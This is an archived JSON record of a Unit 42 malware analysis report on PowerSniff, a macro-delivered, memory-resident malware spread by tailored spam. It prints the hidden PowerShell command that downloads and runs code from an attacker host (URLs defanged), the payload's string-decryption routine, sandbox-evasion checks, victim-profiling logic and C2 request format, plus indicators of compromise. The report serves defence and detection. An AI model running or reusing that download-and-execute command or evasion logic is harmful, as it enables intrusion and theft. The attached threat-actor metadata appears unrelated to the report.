{
	"id": "b3b101b7-774b-4326-bdd2-0629d5ac3328",
	"created_at": "2026-04-06T00:14:29.473842Z",
	"updated_at": "2026-04-10T03:23:51.416553Z",
	"deleted_at": null,
	"sha1_hash": "6d58f77547f237c815016693f3bf395be584a993",
	"title": "PowerSniff Malware Used in Macro-based Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 596372,
	"plain_text": "PowerSniff Malware Used in Macro-based Attacks\r\nBy Josh Grunzweig, Brandon Levene\r\nPublished: 2016-03-11 · Archived: 2026-04-05 16:13:53 UTC\r\nIntroduction\r\nThe concept of file-less malware is not a new one. Families like Poweliks, which abuse Microsoft’s PowerShell,\r\nhave emerged in recent years and have garnered extensive attention due to their ability to compromise a system\r\nwhile leaving little or no trace of their presence to traditional forensic techniques.\r\nSystem administrators have lauded the power and versatility of PowerShell since version 2.0’s integration into\r\nWindows 7. Unfortunately, with such versatility comes the opportunity for abuse, specifically surrounding the\r\ncapability to write directly into memory of the host OS.\r\nTypically, file-less malware has been observed in the context of Exploit Kits such as Angler. Palo Alto Networks\r\nhas observed a recent high-threat spam campaign that is serving malicious macro documents used to execute\r\nPowerShell scripts which injects malware similar to the Ursnif family directly into memory. We call the malware\r\nPowerSniff.\r\nInfection\r\nFirst, victims are presented with an email similar to the image below.\r\nFigure 1 Redacted email containing malicious Word document\r\nAt the time of writing, Palo Alto Networks has observed roughly 1500 emails sent using a variety of filenames.\r\nThe majority of these emails contain specific information about the victim’s company, such as their phone\r\nnumber, physical address, as well as the name of the individual. This additional information is not typically\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 1 of 7\n\nincluded in widespread spam campaigns, and can often provide a sense of trust when seen by the victim, which in\r\nturn may lead to a higher number of opened attachments.\r\nThe following examples of subject names have been witnessed in this campaign:\r\n[Name], Please validate [Something] Gift Card from [Place]\r\n[Name], Please validate this [Name] Gift Voucher\r\n[Name], Please close this unpaid obligation #[Numbers]\r\n[Name], New Reservation at [Place]\r\n[Name], Please settle this unpaid balance [ID|Ref].[Numbers]\r\n[Name], Please settle this overlooked payment [ID|Ref].[Numbers]\r\nAdditionally, the United States appears to be primarily affected by this threat, as shown in the AutoFocus map\r\nbelow:\r\nFigure 2 AutoFocus view of attempted infections based on geographic location\r\nWhile no specific industry has been targeted by this campaign, it appears as though the Professional, Hospitality,\r\nand Manufacturing industries have witnessed these emails most often.\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 2 of 7\n\nFigure 3 AutoFocus view of attempted infections based on industry\r\nMalicious Attachment\r\nIn the event a victim opens the malicious Microsoft Word document attached within the email, they will be\r\nsubjected to a malicious macro contained within this file. The following example macro attempts to execute when\r\nthe document initially opens. Depending on the security settings of Microsoft Word, victims may need to\r\nexplicitly enable the macro to run.\r\nFigure 4 Malicious macro embedded in Microsoft Word document\r\nThis macro will invoke the WMI service to spawn a hidden instance of powershell.exe with the following\r\narguments (The URLs have been defanged for safety):\r\npowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq\r\n4) {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/cache') | iex } else {(new-object\r\nNet.WebClient).DownloadString('http://rabbitons[.]pw/css') | iex}\r\nReaders may notice an if/else statement that is the result of a check against the size of the IntPtr object type. On\r\n32-bit instances of Microsoft Windows, this object will have a size of 4, versus a 64-bit operating system, which\r\nhas a size of 8. This particular check is a quick way for the attackers to determine if they are running on a 32-bit or\r\n64-bit operating system. In the event they are running on a 32-bit system, they will download and execute the file\r\nlocated at the ‘/cache’ URI. Alternatively, they will download and execute the file located at the ‘/css’ URI.\r\nPayload\r\nThe downloaded file is a PowerShell script that contains shellcode, which is subsequently decoded and executed,\r\nas seen in the following image.\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 3 of 7\n\nFigure 5 PowerShell payload downloaded by malware\r\nThis shellcode, once executed, decrypts and executes an embedded payload. This embedded payload begins by\r\ndecrypting a number of strings using the following algorithm, demonstrated in Python:\r\ndef decrypt(data, seed):\r\nout = \"\"\r\nfor d in data:\r\nbyte = (ord(d)^seed) \u0026 0xFF\r\nout += chr(byte)\r\nseed = (0x19660D * seed + 0x3C6EF35F) \u0026 0xFFFFFFFF\r\nreturn out\r\nFor this particular sample (SHA256:\r\n74ec24b5d08266d86c59718a4a476cfa5d220b7b3c8cc594d4b9efc03e8bee0d), the malware uses a seed value of\r\n0xDDBC9D5B. After string decryption completes, the payload performs a number of actions in an attempt to\r\ndetermine if it is running within a virtualized environment or sandbox.\r\nExamples include looking for the following usernames:\r\nMALTEST\r\nTEQUILABOOMBOOM\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 4 of 7\n\nSANDBOX\r\nVIRUS\r\nMALWARE\r\nThe payload also checks for the presence of the following libraries:\r\nsbiedll.dll\r\ndbghelp.dll\r\napi_log.dll\r\ndir_watch.dll\r\npstorec.dll\r\nvmERROR.dll\r\nwpespy.dll\r\nPrxDrvPE.dll\r\nPrxDrvPE64.dll\r\nOther simple checks, such as a call to IsDebuggerPresent(), are also performed.\r\nThe payload proceeds to perform reconnaissance against the victim host by executing an ‘ipconfig -all’ in a new\r\nprocess and inspecting the results. The malware specifically looks for the absence of the following strings:\r\nschool\r\nhospital\r\ncolledge\r\nhealth\r\nNURSE\r\nIf these strings are not discovered, it will proceed to check the cached URLs on the victim machine against the\r\nfollowing list:\r\nCitrix\r\nXenApp\r\ndana-na\r\nIf one of these strings, or any of a short list of financial institution websites is found in the cache, this victim\r\nmachine is identified as being interesting to the attackers, and will be marked with a type of ‘666’ in subsequent\r\nHTTP requests. Additionally, the malware will take the output of the ‘net view’ command and look for the absence\r\nof the following strings:\r\nTEACHER\r\nSTUDENT\r\nSCHOOLBOARD\r\nPEDIATRICS\r\nORTHOPED\r\nIt will also look for the presence of the following strings:\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 5 of 7\n\nPOS\r\nSTORE\r\nSHOP\r\nSALE\r\nIf these conditions are met, the victim machine will be identified as interesting, and marked with a type of ‘666’.\r\nAlternatively, if none of the previous conditions are met, the payload will mark the victim with a type of ‘555’.\r\nAs a summary to these checks, it would appear as though this malware is attempting to actively avoid healthcare\r\nand education machines, as well as target point of sale instances and machines that conduct financial transactions.\r\nSimilar techniques were witnessed in a malware family named ‘Ursnif’ in mid-2015.\r\nAfter this reconnaissance has been performed, the malware will make a HTTP GET request to one of the\r\nembedded C2 servers, using the following format:\r\n/yuppi/?user=%08x%08x%08x%08x\u0026id=%u\u0026ver=%u\u0026os=%lu\u0026os2=%lu\u0026host=%u\u0026k=%lu\u0026type=%u\r\nThe ‘type’ variable contains the ‘555’ or ‘666’ previously discussed. The ‘id’ and ‘ver’ variables are hardcoded.\r\nThis particular sample used values of 24 and 123 respectively. The ‘k’ parameter is used as a decryption seed in\r\nthe C2 server’s response. In the event the C2 server is responsive, it will return an encrypted DLL. This DLL can\r\nbe decrypted using the same decryption previously discussed, using the seed value located in the ‘k’ parameter.\r\nThis DLL is then temporarily written to disk in the following location:\r\n%%userprofile%%\\\\AppData\\\\LocalLow\\\\[random].db\r\nAfter being written to disk, it will be executed using a call to rundll32.exe. The exported function of ‘Register’ is\r\nused when loading this malicious DLL. No C2 servers were responsive at the time of analysis.\r\nConclusion and Acknowledgements\r\nThis widespread spam campaign has been witnessed in the past week. Due to the target-specific details contained\r\nwithin the spam emails and the use of memory-resident malware, this particular campaign should be treated as a\r\nhigh threat. As this malware relies on malicious macros within Microsoft Word documents, users should ensure\r\nthat macros are not enabled by default and should be wary of opening any macros in files received from untrusted\r\nsources.\r\nPalo Alto Networks WildFire customers are protected against this threat, as all encountered files have been\r\ncorrectly flagged as malicious. Additionally, all C2 domains currently encountered have also been marked\r\nmalicious. AutoFocus users can identify this malware using the PowerSniff tag.\r\nThe researchers would like to thank Cert.pl’s @maciekkotowicz for his excellent analysis of the configuration\r\ndata of the malware.\r\nIndicators of Compromise\r\nSHA256 Hashes\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 6 of 7\n\na8663becc17e34f85d828f53029ab110f92f635c3dfd94132e5ac87e2f0cdfc3\r\n30cd5d32bc3c046cfc584cb8521f5589c4d86a4241d1a9ae6c8e9172aa58ac73\r\n0661c68e6c247cd6f638dbcac7914c826a5feee1013e456af2f1f6fd642f4147\r\nf204c10af7cdcc0b57e77b2e521b4b0ac04667ccffce478cb4c3b8b8f18e32a2\r\n7e22ea4e06b8fd6698d224ce04b3ef5f00838543cb96fb234e4a8c84bb5fa7b3\r\nf45bf212c43d1d30cc00f64b3dcae5c35d4a85cacd9350646f7918a30af1b709\r\n1e746ba37c56f7f2422e6e01aa6fde6f019214a1e12475fe54ee5c2cf1b9f083\r\n340f82a198aa510159989058f3f62861de74135666c50060491144b7b3ec5a6f\r\n815bd46e66f1d330ed49c6f4a4e570da2ec89bcd665cedf025028a94d7b0cc1e\r\na1770a7671679f13601e75a7cb841fea90c7add78436a0bea875ce50b92afc33\r\n83e305724e9cd020b8f80535c5dd897b2057cee7d2bb48461614a37941e78e3a\r\n74ec24b5d08266d86c59718a4a476cfa5d220b7b3c8cc594d4b9efc03e8bee0d\r\n90a7951683a5a77a21d4a544b76e2e6ee04e357d2f5bfcff01cd6924906adf77\r\n2c21dafcb4f50cae47d0d4314810226cba3ee4e61811f5c778353c8eac9ba7dc\r\n247511ab6d7d3820b9d345bb899a7827ce62c9dd27c538c75a73f5beba6c6018\r\n708374a4dfaaa8e44ee217ca5946511cacec55da5eabb0feb1df321753258782\r\n136379754edd05c20d5162aed7e10774a95657f69d4f9a5de17a8059c9018aa6\r\n5d215ef3affe320efe4f5034513697675de40ba8878ca82e80b07ad1b8d61ed8\r\nCommand and Control Servers\r\nsupratimewest[.]com\r\nletterinklandoix[.]net\r\nsupratimewest[.]biz\r\nstarwoodhotels[.]pw\r\noklinjgreirestacks[.]biz\r\nwww.starwoodhotels[.]pw\r\nbrookmensoklinherz[.]org\r\nSource: https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/"
	],
	"report_names": [
		"powersniff-malware-used-in-macro-based-attacks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d58f77547f237c815016693f3bf395be584a993.pdf",
		"text": "https://archive.orkl.eu/6d58f77547f237c815016693f3bf395be584a993.txt",
		"img": "https://archive.orkl.eu/6d58f77547f237c815016693f3bf395be584a993.jpg"
	}
}